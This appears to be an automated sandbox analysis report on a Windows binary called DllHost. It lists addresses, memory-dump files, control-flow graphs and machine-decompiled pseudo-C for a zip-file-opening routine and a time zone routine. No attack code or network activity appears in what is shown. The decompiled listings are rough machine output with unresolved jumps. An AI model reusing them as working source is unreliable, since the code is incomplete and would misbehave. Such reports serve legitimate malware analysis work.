                                                                                                                                                              0x7ff7191f40d5
                                                                                                                                                              0x7ff7191f40da
                                                                                                                                                              0x7ff7191f40e0
                                                                                                                                                              0x7ff7191f40f4
                                                                                                                                                              0x7ff7191f4100
                                                                                                                                                              0x7ff7191f4107
                                                                                                                                                              0x7ff7191f410f
                                                                                                                                                              0x7ff7191f4114
                                                                                                                                                              0x7ff7191f4119
                                                                                                                                                              0x7ff7191f4124
                                                                                                                                                              0x7ff7191f412b
                                                                                                                                                              0x7ff7191f412f
                                                                                                                                                              0x7ff7191f4132
                                                                                                                                                              0x7ff7191f4136
                                                                                                                                                              0x7ff7191f413c
                                                                                                                                                              0x7ff7191f414b
                                                                                                                                                              0x7ff7191f4153
                                                                                                                                                              0x7ff7191f4159
                                                                                                                                                              0x7ff7191f4162
                                                                                                                                                              0x7ff7191f4167
                                                                                                                                                              0x7ff7191f416b
                                                                                                                                                              0x7ff7191f416e
                                                                                                                                                              0x7ff7191f4175
                                                                                                                                                              0x7ff7191f417a
                                                                                                                                                              0x7ff7191f4186
                                                                                                                                                              0x7ff7191f4193
                                                                                                                                                              0x7ff7191f4195
                                                                                                                                                              0x7ff7191f41ad
                                                                                                                                                              0x7ff7191f41b1
                                                                                                                                                              0x7ff7191f41be
                                                                                                                                                              0x7ff7191f41c3
                                                                                                                                                              0x7ff7191f41cb
                                                                                                                                                              0x7ff7191f41d3
                                                                                                                                                              0x7ff7191f41dd
                                                                                                                                                              0x7ff7191f41df
                                                                                                                                                              0x7ff7191f4200
                                                                                                                                                              0x7ff7191f4208
                                                                                                                                                              0x7ff7191f4210
                                                                                                                                                              0x7ff7191f4216
                                                                                                                                                              0x7ff7191f421b
                                                                                                                                                              0x7ff7191f4221
                                                                                                                                                              0x7ff7191f4226
                                                                                                                                                              0x7ff7191f422d
                                                                                                                                                              0x7ff7191f422f
                                                                                                                                                              0x7ff7191f4233
                                                                                                                                                              0x7ff7191f4238
                                                                                                                                                              0x7ff7191f423a
                                                                                                                                                              0x7ff7191f4243
                                                                                                                                                              0x7ff7191f4255
                                                                                                                                                              0x7ff7191f4260
                                                                                                                                                              0x7ff7191f426c
                                                                                                                                                              0x7ff7191f4286
                                                                                                                                                              0x7ff7191f428f
                                                                                                                                                              0x7ff7191f4293
                                                                                                                                                              0x7ff7191f4298
                                                                                                                                                              0x7ff7191f429d
                                                                                                                                                              0x7ff7191f42a1
                                                                                                                                                              0x7ff7191f42a9
                                                                                                                                                              0x7ff7191f42ae
                                                                                                                                                              0x7ff7191f42b8
                                                                                                                                                              0x7ff7191f42c1
                                                                                                                                                              0x7ff7191f42c4
                                                                                                                                                              0x7ff7191f42c8
                                                                                                                                                              0x7ff7191f42cc
                                                                                                                                                              0x7ff7191f42d1
                                                                                                                                                              0x7ff7191f42d6
                                                                                                                                                              0x7ff7191f42d9
                                                                                                                                                              0x7ff7191f42de
                                                                                                                                                              0x7ff7191f42f5
                                                                                                                                                              0x7ff7191f42f9
                                                                                                                                                              0x7ff7191f4306
                                                                                                                                                              0x7ff7191f430a
                                                                                                                                                              0x7ff7191f4316
                                                                                                                                                              0x7ff7191f431b
                                                                                                                                                              0x7ff7191f4323
                                                                                                                                                              0x7ff7191f4329
                                                                                                                                                              0x7ff7191f432b
                                                                                                                                                              0x7ff7191f433c
                                                                                                                                                              0x7ff7191f4340
                                                                                                                                                              0x7ff7191f4350
                                                                                                                                                              0x7ff7191f435a
                                                                                                                                                              0x7ff7191f4363
                                                                                                                                                              0x7ff7191f4371
                                                                                                                                                              0x7ff7191f4375
                                                                                                                                                              0x7ff7191f4379
                                                                                                                                                              0x7ff7191f437e
                                                                                                                                                              0x7ff7191f4385
                                                                                                                                                              0x7ff7191f438d
                                                                                                                                                              0x7ff7191f4398
                                                                                                                                                              0x7ff7191f43a5
                                                                                                                                                              0x7ff7191f43af
                                                                                                                                                              0x7ff7191f43c9
                                                                                                                                                              0x7ff7191f43d0
                                                                                                                                                              0x7ff7191f43d5
                                                                                                                                                              0x7ff7191f43ef
                                                                                                                                                              0x7ff7191f4416

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type_get_daylight
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1330151763-0
                                                                                                                                                              • Opcode ID: ab8994ed691e28767cbfe096fbe4a80e7c4932238c3333e658feacb1f95b8692
                                                                                                                                                              • Instruction ID: 0ea7ddde46326536e60dd57eb1cf55847405d90a78d850d9d059b0d6898e7196
                                                                                                                                                              • Opcode Fuzzy Hash: ab8994ed691e28767cbfe096fbe4a80e7c4932238c3333e658feacb1f95b8692
                                                                                                                                                              • Instruction Fuzzy Hash: CAC19E37B24E4686FB10EF64E4846AC7775EB48BA8B500229DB1E977D4DF38D09AD310
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191C4270 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 215COMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 1041 7ff7191c4270-7ff7191c42ac 1042 7ff7191c42be-7ff7191c42e2 call 7ff7191bfec0 1041->1042 1043 7ff7191c42ae-7ff7191c42bc call 7ff7191b9e00 1041->1043 1048 7ff7191c42e4 1042->1048 1049 7ff7191c42e7-7ff7191c4318 call 7ff7191bab00 1042->1049 1050 7ff7191c431d-7ff7191c4334 call 7ff7191b9e00 1043->1050 1048->1049 1049->1050 1055 7ff7191c4336-7ff7191c4344 1050->1055 1056 7ff7191c4378-7ff7191c437b 1050->1056 1055->1056 1059 7ff7191c4346-7ff7191c4357 1055->1059 1057 7ff7191c437d-7ff7191c4388 1056->1057 1058 7ff7191c43cb-7ff7191c43ce 1056->1058 1060 7ff7191c438a-7ff7191c439b 1057->1060 1061 7ff7191c43bb-7ff7191c43c7 1057->1061 1062 7ff7191c43d0-7ff7191c43d8 1058->1062 1063 7ff7191c441b-7ff7191c4420 1058->1063 1064 7ff7191c4372-7ff7191c4377 call 7ff7191d23d0 1059->1064 1065 7ff7191c4359-7ff7191c436c 1059->1065 1066 7ff7191c43b6 call 7ff7191d23d0 1060->1066 1067 7ff7191c439d-7ff7191c43b0 1060->1067 1061->1058 1068 7ff7191c43da-7ff7191c43eb 1062->1068 1069 7ff7191c440b-7ff7191c4417 1062->1069 1072 7ff7191c4422 1063->1072 1073 7ff7191c4425-7ff7191c4436 call 7ff7191c67a0 1063->1073 1064->1056 1065->1064 1070 7ff7191c44fd-7ff7191c4502 call 7ff7191da5f8 1065->1070 1066->1061 1067->1066 1075 7ff7191c4503-7ff7191c4508 call 7ff7191da5f8 1067->1075 1077 7ff7191c4406 call 7ff7191d23d0 1068->1077 1078 7ff7191c43ed-7ff7191c4400 1068->1078 1069->1063 1070->1075 1072->1073 1087 7ff7191c4498 1073->1087 1088 7ff7191c4438-7ff7191c4450 call 7ff7191c3230 1073->1088 1083 7ff7191c4509-7ff7191c450e call 7ff7191da5f8 1075->1083 1077->1069 1078->1077 1078->1083 1096 7ff7191c450f-7ff7191c459a call 7ff7191c0de0 call 7ff7191bfc00 call 7ff7191c16d0 call 7ff7191bfc00 call 7ff7191bfbe0 call 7ff7191bfc00 call 7ff7191c51d0 call 7ff7191b9d50 call 7ff7191c1330 call 7ff7191d41cc 1083->1096 1090 7ff7191c449a-7ff7191c44a5 1087->1090 1099 7ff7191c4452-7ff7191c4454 1088->1099 1100 7ff7191c4456-7ff7191c4470 call 7ff7191c45b0 1088->1100 1093 7ff7191c44d7-7ff7191c44f6 call 7ff7191d23b0 1090->1093 1094 7ff7191c44a7-7ff7191c44bb 1090->1094 1097 7ff7191c44d2 call 7ff7191d23d0 1094->1097 1098 7ff7191c44bd-7ff7191c44d0 1094->1098 1097->1093 1098->1097 1103 7ff7191c44f7-7ff7191c44fc call 7ff7191da5f8 1098->1103 1105 7ff7191c448a-7ff7191c4496 call 7ff7191bd800 1099->1105 1113 7ff7191c4472-7ff7191c4476 call 7ff7191c6350 1100->1113 1114 7ff7191c4485-7ff7191c4487 1100->1114 1103->1070 1105->1090 1120 7ff7191c447b-7ff7191c447f 1113->1120 1114->1105 1120->1096 1120->1114
                                                                                                                                                              C-Code - Quality: 37%
                                                                                                                                                              			E00007FF77FF7191C4270(void* __edx, void* __esi, void* __rcx, intOrPtr* __rdx, char* __r8, void* __r9, void* __r11, void* __r12) {
				void* __rbx;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* __r14;
				void* _t55;
				void* _t57;
				void* _t58;
				void* _t71;
				void* _t72;
				signed long long _t98;
				char* _t100;
				void* _t114;
				intOrPtr _t140;
				intOrPtr _t143;
				intOrPtr _t146;
				intOrPtr _t152;
				intOrPtr* _t155;
				void* _t157;
				void* _t158;
				void* _t159;
				signed long long _t160;
				void* _t166;
				void* _t169;
				long long _t170;
				void* _t171;

				_t168 = __r12;
				_t166 = __r9;
				_t72 = __edx;
				_t158 = _t159 - 0x130;
				_t160 = _t159 - 0x230;
				_t98 =  *0x192190a0; // 0x590452ce5669
				 *(_t158 + 0x120) = _t98 ^ _t160;
				_t100 = __r8;
				_t155 = __rdx;
				_t157 = __rcx;
				r14d = 0;
				 *((intOrPtr*)(_t160 + 0x20)) = r14d;
				if ( *((intOrPtr*)(__r8 + 0x10)) != _t170) goto 0x191c42be;
				E00007FF77FF7191B9E00(__r8, _t114, _t158 + 0x50, __rdx, __rcx);
				goto 0x191c431d;
				E00007FF77FF7191BFEC0(_t114, _t158 + 0x30, _t100, _t155, 0x19219000, __r12);
				 *((intOrPtr*)(_t160 + 0x20)) = 2;
				if ( *((long long*)(_t155 + 0x18)) - 0x10 < 0) goto 0x191c42e7;
				E00007FF77FF7191BAB00(_t114, _t100, _t157,  *((intOrPtr*)(_t155 + 0x10)));
				asm("movups xmm0, [eax]");
				asm("movups [ebp+0x70], xmm0");
				asm("movups xmm1, [eax+0x10]");
				asm("movups [ebp+0x80], xmm1");
				 *((long long*)(_t100 + 0x10)) = _t170;
				 *((long long*)(_t100 + 0x18)) = 0xf;
				 *_t100 = 0;
				 *((intOrPtr*)(_t160 + 0x20)) = 0xe;
				E00007FF77FF7191B9E00(_t158 + 0x70, _t114, _t158 + 0x90, _t158 + 0x70, _t157);
				if (4 == 0) goto 0x191c4378;
				_t140 =  *((intOrPtr*)(_t158 + 0x88));
				if (_t140 - 0x10 < 0) goto 0x191c4378;
				if (_t140 + 1 - 0x1000 < 0) goto 0x191c4372;
				if ( *((intOrPtr*)(_t158 + 0x70)) -  *((intOrPtr*)( *((intOrPtr*)(_t158 + 0x70)) - 8)) + 0xfffffff8 - 0x1f > 0) goto 0x191c44fd;
				0x191d23d0();
				if (2 == 0) goto 0x191c43cb;
				_t143 =  *((intOrPtr*)(_t158 + 0x48));
				if (_t143 - 0x10 < 0) goto 0x191c43bb;
				if (_t143 + 1 - 0x1000 < 0) goto 0x191c43b6;
				if ( *((intOrPtr*)(_t158 + 0x30)) -  *((intOrPtr*)( *((intOrPtr*)(_t158 + 0x30)) - 8)) + 0xfffffff8 - 0x1f > 0) goto 0x191c4503;
				0x191d23d0();
				 *((long long*)(_t158 + 0x40)) = _t170;
				 *((long long*)(_t158 + 0x48)) = 0xf;
				 *((char*)(_t158 + 0x30)) = 0;
				if (0 == 0) goto 0x191c441b;
				_t146 =  *((intOrPtr*)(_t158 + 0x68));
				if (_t146 - 0x10 < 0) goto 0x191c440b;
				if (_t146 + 1 - 0x1000 < 0) goto 0x191c4406;
				if ( *((intOrPtr*)(_t158 + 0x50)) -  *((intOrPtr*)( *((intOrPtr*)(_t158 + 0x50)) - 8)) + 0xfffffff8 - 0x1f > 0) goto 0x191c4509;
				0x191d23d0();
				 *((long long*)(_t158 + 0x60)) = _t170;
				 *((long long*)(_t158 + 0x68)) = 0xf;
				 *((char*)(_t158 + 0x50)) = 0;
				if ( *((long long*)(_t155 + 0x18)) - 0x10 < 0) goto 0x191c4425;
				r8d = 0;
				_t55 = E00007FF77FF7191C67A0( *((intOrPtr*)(_t157 + 8)),  *_t155, _t157,  *((intOrPtr*)(_t155 + 0x10)), _t168, _t169, _t170, _t171); // executed
				if (_t55 != 0) goto 0x191c4498;
				E00007FF77FF7191C3230(_t114, _t157, _t158 + 0xb0, __r11); // executed
				if ( *((long long*)(_t158 + 0xc0)) != 0) goto 0x191c4456;
				goto 0x191c448a;
				_t57 = E00007FF77FF7191C45B0(0, _t71, _t72, _t157, _t158 + 0x90, _t158 + 0xb0, _t166, __r11); // executed
				if (_t57 != 0) goto 0x191c4485;
				_t58 = E00007FF77FF7191C6350(_t114,  *((intOrPtr*)(_t157 + 8)), _t157, _t170); // executed
				if (_t58 != 0) goto 0x191c450f;
				E00007FF77FF7191BD800(_t58, _t158 + 0xb0);
				goto 0x191c449a;
				_t152 =  *((intOrPtr*)(_t158 + 0xa8));
				if (_t152 - 0x10 < 0) goto 0x191c44d7;
				if (_t152 + 1 - 0x1000 < 0) goto 0x191c44d2;
				if ( *((intOrPtr*)(_t158 + 0x90)) -  *((intOrPtr*)( *((intOrPtr*)(_t158 + 0x90)) - 8)) + 0xfffffff8 - 0x1f > 0) goto 0x191c44f7;
				0x191d23d0();
				return E00007FF77FF7191D23B0(0, _t71,  *(_t158 + 0x120) ^ _t160);
			}





























                                                                                                                                                              0x7ff7191c4270
                                                                                                                                                              0x7ff7191c4270
                                                                                                                                                              0x7ff7191c4270
                                                                                                                                                              0x7ff7191c4277
                                                                                                                                                              0x7ff7191c427f
                                                                                                                                                              0x7ff7191c4286
                                                                                                                                                              0x7ff7191c4290
                                                                                                                                                              0x7ff7191c4297
                                                                                                                                                              0x7ff7191c429a
                                                                                                                                                              0x7ff7191c429d
                                                                                                                                                              0x7ff7191c42a0
                                                                                                                                                              0x7ff7191c42a3
                                                                                                                                                              0x7ff7191c42ac
                                                                                                                                                              0x7ff7191c42b2
                                                                                                                                                              0x7ff7191c42bc
                                                                                                                                                              0x7ff7191c42cc
                                                                                                                                                              0x7ff7191c42d2
                                                                                                                                                              0x7ff7191c42e2
                                                                                                                                                              0x7ff7191c42ee
                                                                                                                                                              0x7ff7191c42f3
                                                                                                                                                              0x7ff7191c42f6
                                                                                                                                                              0x7ff7191c42fa
                                                                                                                                                              0x7ff7191c42fe
                                                                                                                                                              0x7ff7191c4305
                                                                                                                                                              0x7ff7191c4309
                                                                                                                                                              0x7ff7191c4311
                                                                                                                                                              0x7ff7191c431d
                                                                                                                                                              0x7ff7191c432b
                                                                                                                                                              0x7ff7191c4334
                                                                                                                                                              0x7ff7191c4339
                                                                                                                                                              0x7ff7191c4344
                                                                                                                                                              0x7ff7191c4357
                                                                                                                                                              0x7ff7191c436c
                                                                                                                                                              0x7ff7191c4372
                                                                                                                                                              0x7ff7191c437b
                                                                                                                                                              0x7ff7191c4380
                                                                                                                                                              0x7ff7191c4388
                                                                                                                                                              0x7ff7191c439b
                                                                                                                                                              0x7ff7191c43b0
                                                                                                                                                              0x7ff7191c43b6
                                                                                                                                                              0x7ff7191c43bb
                                                                                                                                                              0x7ff7191c43bf
                                                                                                                                                              0x7ff7191c43c7
                                                                                                                                                              0x7ff7191c43ce
                                                                                                                                                              0x7ff7191c43d0
                                                                                                                                                              0x7ff7191c43d8
                                                                                                                                                              0x7ff7191c43eb
                                                                                                                                                              0x7ff7191c4400
                                                                                                                                                              0x7ff7191c4406
                                                                                                                                                              0x7ff7191c440b
                                                                                                                                                              0x7ff7191c440f
                                                                                                                                                              0x7ff7191c4417
                                                                                                                                                              0x7ff7191c4420
                                                                                                                                                              0x7ff7191c4425
                                                                                                                                                              0x7ff7191c442f
                                                                                                                                                              0x7ff7191c4436
                                                                                                                                                              0x7ff7191c4442
                                                                                                                                                              0x7ff7191c4450
                                                                                                                                                              0x7ff7191c4454
                                                                                                                                                              0x7ff7191c4467
                                                                                                                                                              0x7ff7191c4470
                                                                                                                                                              0x7ff7191c4476
                                                                                                                                                              0x7ff7191c447f
                                                                                                                                                              0x7ff7191c4491
                                                                                                                                                              0x7ff7191c4496
                                                                                                                                                              0x7ff7191c449a
                                                                                                                                                              0x7ff7191c44a5
                                                                                                                                                              0x7ff7191c44bb
                                                                                                                                                              0x7ff7191c44d0
                                                                                                                                                              0x7ff7191c44d2
                                                                                                                                                              0x7ff7191c44f6

                                                                                                                                                              APIs
                                                                                                                                                              • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7191C44F7
                                                                                                                                                              • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7191C44FD
                                                                                                                                                              • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7191C4503
                                                                                                                                                              • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7191C4509
                                                                                                                                                                • Part of subcall function 00007FF7191C1330: __std_exception_copy.LIBVCRUNTIME ref: 00007FF7191C135F
                                                                                                                                                                • Part of subcall function 00007FF7191D41CC: RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,7FFFFFFFFFFFFFFF,00007FF7191D0F5E), ref: 00007FF7191D4210
                                                                                                                                                                • Part of subcall function 00007FF7191D41CC: _purecall.KERNELBASE(?,?,?,?,?,?,?,?,7FFFFFFFFFFFFFFF,00007FF7191D0F5E), ref: 00007FF7191D4256
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _invalid_parameter_noinfo_noreturn$FileHeader__std_exception_copy_purecall
                                                                                                                                                              • String ID: openinginternal file '$' in zip$Error
                                                                                                                                                              • API String ID: 1678417096-2308420065
                                                                                                                                                              • Opcode ID: 0d87bb61b69d4386aeef3b69ca588d59c1eb9869359ecc9b7f80a61d86cc8b1c
                                                                                                                                                              • Instruction ID: 8d8a89946183a7b2d302851fb11c582a0dea59ec5ecb49eb40ca07ec1144985c
                                                                                                                                                              • Opcode Fuzzy Hash: 0d87bb61b69d4386aeef3b69ca588d59c1eb9869359ecc9b7f80a61d86cc8b1c
                                                                                                                                                              • Instruction Fuzzy Hash: 1291A362A68E8245FB10AF24E8543E96371EF45BBCF905231DA2D066D6DF7CE1CAD210
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191ED64C Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 157timeCOMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 1136 7ff7191ed64c-7ff7191ed676 call 7ff7191ecec0 call 7ff7191ecf28 1141 7ff7191ed7dd-7ff7191ed84d call 7ff7191da628 call 7ff7191f4e54 1136->1141 1142 7ff7191ed67c-7ff7191ed687 call 7ff7191ecec8 1136->1142 1154 7ff7191ed856-7ff7191ed859 1141->1154 1155 7ff7191ed84f-7ff7191ed854 1141->1155 1142->1141 1147 7ff7191ed68d-7ff7191ed698 call 7ff7191ecef8 1142->1147 1147->1141 1153 7ff7191ed69e-7ff7191ed6c1 call 7ff7191e6b28 GetTimeZoneInformation 1147->1153 1167 7ff7191ed7b6-7ff7191ed7dc call 7ff7191eceb8 call 7ff7191ecea8 call 7ff7191eceb0 1153->1167 1168 7ff7191ed6c7-7ff7191ed6e8 1153->1168 1156 7ff7191ed860-7ff7191ed870 call 7ff7191e82bc 1154->1156 1157 7ff7191ed85b-7ff7191ed85e 1154->1157 1159 7ff7191ed8a4-7ff7191ed8b6 1155->1159 1171 7ff7191ed872 1156->1171 1172 7ff7191ed87b-7ff7191ed896 call 7ff7191f4e54 1156->1172 1157->1159 1162 7ff7191ed8c7 1159->1162 1163 7ff7191ed8b8-7ff7191ed8bb 1159->1163 1164 7ff7191ed8cc-7ff7191ed8f8 call 7ff7191e6b28 call 7ff7191d23b0 1162->1164 1165 7ff7191ed8c7 call 7ff7191ed64c 1162->1165 1163->1162 1169 7ff7191ed8bd-7ff7191ed8c5 call 7ff7191ed444 1163->1169 1165->1164 1173 7ff7191ed6f3-7ff7191ed6fa 1168->1173 1174 7ff7191ed6ea-7ff7191ed6f0 1168->1174 1169->1164 1178 7ff7191ed874-7ff7191ed879 call 7ff7191e6b28 1171->1178 1194 7ff7191ed89d 1172->1194 1195 7ff7191ed898-7ff7191ed89b 1172->1195 1179 7ff7191ed70e-7ff7191ed710 1173->1179 1180 7ff7191ed6fc-7ff7191ed704 1173->1180 1174->1173 1178->1157 1189 7ff7191ed712-7ff7191ed753 call 7ff7191dd9dc call 7ff7191eb214 1179->1189 1180->1179 1187 7ff7191ed706-7ff7191ed70c 1180->1187 1187->1189 1202 7ff7191ed755-7ff7191ed758 1189->1202 1203 7ff7191ed763-7ff7191ed766 1189->1203 1194->1159 1197 7ff7191ed89f call 7ff7191e6b28 1194->1197 1195->1178 1197->1159 1202->1203 1204 7ff7191ed75a-7ff7191ed761 1202->1204 1205 7ff7191ed769-7ff7191ed79e call 7ff7191eb214 1203->1205 1204->1205 1208 7ff7191ed7af-7ff7191ed7b3 1205->1208 1209 7ff7191ed7a0-7ff7191ed7a3 1205->1209 1208->1167 1209->1208 1210 7ff7191ed7a5-7ff7191ed7ad 1209->1210 1210->1167
                                                                                                                                                              C-Code - Quality: 60%
                                                                                                                                                              			E00007FF77FF7191ED64C(void* __ecx, void* __eflags, signed int** __rax, void* __rdx, signed int _a8, char _a16, signed int _a24, signed int _a32) {
				long long _v48;
				long long _v56;
				intOrPtr _v64;
				long long _v72;
				void* _t32;
				long _t38;
				intOrPtr _t41;
				void* _t43;
				void* _t44;
				void* _t45;
				void* _t46;
				signed int _t55;
				intOrPtr _t67;
				intOrPtr _t68;
				signed int** _t74;
				signed int* _t81;
				signed int** _t82;
				long long _t86;
				long long _t90;

				_t74 = __rax;
				E00007FF77FF7191ECEC0(_t32);
				_a8 = 0;
				_t82 = _t74;
				_a24 = 0;
				_a32 = 0;
				if (E00007FF77FF7191ECF28(_t74,  &_a8) != 0) goto 0x191ed7dd;
				if (E00007FF77FF7191ECEC8(_t74,  &_a24) != 0) goto 0x191ed7dd;
				if (E00007FF77FF7191ECEF8(_t74,  &_a32) != 0) goto 0x191ed7dd;
				_t86 =  *0x1921bd30; // 0x0
				E00007FF77FF7191E6B28(_t74, _t86);
				 *0x1921bd30 = _t90; // executed
				_t38 = GetTimeZoneInformation(??); // executed
				if (_t38 == 0xffffffff) goto 0x191ed7b6;
				_t55 =  *0x1921bd50 * 0x3c;
				_t7 = _t90 + 1; // 0x1
				_t67 =  *0x1921bd96; // 0xa
				r8d =  *0x1921bda4; // 0x0
				 *0x1921bd40 = _t7;
				_a8 = _t55;
				if (_t67 == 0) goto 0x191ed6f3;
				_a8 = r8d * 0x3c + _t55;
				_t68 =  *0x1921bdea; // 0x3
				if (_t68 == 0) goto 0x191ed70e;
				_t41 =  *0x1921bdf8; // 0xffffffc4
				if (_t41 == 0) goto 0x191ed70e;
				goto 0x191ed712;
				_a24 = 0;
				_a32 = 0;
				_t43 = E00007FF77FF7191DD9DC(_t74);
				r9d = r9d | 0xffffffff;
				_v48 =  &_a16;
				_v56 = _t90;
				_v64 = 0x3f;
				_v72 =  *_t82;
				E00007FF77FF7191EB214();
				if (_t43 == 0) goto 0x191ed763;
				if (_a16 != 0) goto 0x191ed763;
				( *_t82)[0xf] = sil;
				goto 0x191ed769;
				 *( *_t82) = sil;
				r9d = r9d | 0xffffffff;
				_v48 =  &_a16;
				_v56 = _t90;
				_v64 = 0x3f;
				_v72 = _t82[1];
				E00007FF77FF7191EB214();
				if (_t43 == 0) goto 0x191ed7af;
				if (_a16 != 0) goto 0x191ed7af;
				_t82[1][0xf] = sil;
				goto 0x191ed7b6;
				_t81 = _t82[1];
				 *_t81 = sil;
				_t44 = E00007FF77FF7191ECEB8(_t43);
				 *_t81 = _a8;
				_t45 = E00007FF77FF7191ECEA8(_t44);
				 *_t81 = _a24;
				_t46 = E00007FF77FF7191ECEB0(_t45);
				 *_t81 = _a32;
				return _t46;
			}






















                                                                                                                                                              0x7ff7191ed64c
                                                                                                                                                              0x7ff7191ed658
                                                                                                                                                              0x7ff7191ed663
                                                                                                                                                              0x7ff7191ed666
                                                                                                                                                              0x7ff7191ed669
                                                                                                                                                              0x7ff7191ed66c
                                                                                                                                                              0x7ff7191ed676
                                                                                                                                                              0x7ff7191ed687
                                                                                                                                                              0x7ff7191ed698
                                                                                                                                                              0x7ff7191ed69e
                                                                                                                                                              0x7ff7191ed6a5
                                                                                                                                                              0x7ff7191ed6b1
                                                                                                                                                              0x7ff7191ed6b8
                                                                                                                                                              0x7ff7191ed6c1
                                                                                                                                                              0x7ff7191ed6c7
                                                                                                                                                              0x7ff7191ed6ce
                                                                                                                                                              0x7ff7191ed6d1
                                                                                                                                                              0x7ff7191ed6d8
                                                                                                                                                              0x7ff7191ed6df
                                                                                                                                                              0x7ff7191ed6e5
                                                                                                                                                              0x7ff7191ed6e8
                                                                                                                                                              0x7ff7191ed6f0
                                                                                                                                                              0x7ff7191ed6f3
                                                                                                                                                              0x7ff7191ed6fa
                                                                                                                                                              0x7ff7191ed6fc
                                                                                                                                                              0x7ff7191ed704
                                                                                                                                                              0x7ff7191ed70c
                                                                                                                                                              0x7ff7191ed712
                                                                                                                                                              0x7ff7191ed715
                                                                                                                                                              0x7ff7191ed718
                                                                                                                                                              0x7ff7191ed729
                                                                                                                                                              0x7ff7191ed733
                                                                                                                                                              0x7ff7191ed738
                                                                                                                                                              0x7ff7191ed73d
                                                                                                                                                              0x7ff7191ed745
                                                                                                                                                              0x7ff7191ed74c
                                                                                                                                                              0x7ff7191ed753
                                                                                                                                                              0x7ff7191ed758
                                                                                                                                                              0x7ff7191ed75d
                                                                                                                                                              0x7ff7191ed761
                                                                                                                                                              0x7ff7191ed766
                                                                                                                                                              0x7ff7191ed76d
                                                                                                                                                              0x7ff7191ed771
                                                                                                                                                              0x7ff7191ed783
                                                                                                                                                              0x7ff7191ed78a
                                                                                                                                                              0x7ff7191ed792
                                                                                                                                                              0x7ff7191ed797
                                                                                                                                                              0x7ff7191ed79e
                                                                                                                                                              0x7ff7191ed7a3
                                                                                                                                                              0x7ff7191ed7a9
                                                                                                                                                              0x7ff7191ed7ad
                                                                                                                                                              0x7ff7191ed7af
                                                                                                                                                              0x7ff7191ed7b3
                                                                                                                                                              0x7ff7191ed7b9
                                                                                                                                                              0x7ff7191ed7be
                                                                                                                                                              0x7ff7191ed7c3
                                                                                                                                                              0x7ff7191ed7c8
                                                                                                                                                              0x7ff7191ed7cd
                                                                                                                                                              0x7ff7191ed7d2
                                                                                                                                                              0x7ff7191ed7dc

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _get_daylight_invalid_parameter_noinfo$InformationPrivilegeReleaseTimeZone
                                                                                                                                                              • String ID: ?$W. Europe Daylight Time$W. Europe Standard Time
                                                                                                                                                              • API String ID: 2593325745-1770070496
                                                                                                                                                              • Opcode ID: b1f496622d88609ec7606c5ca2a3dd68933ca8243b7aa4fdcafc7ac4361917bc
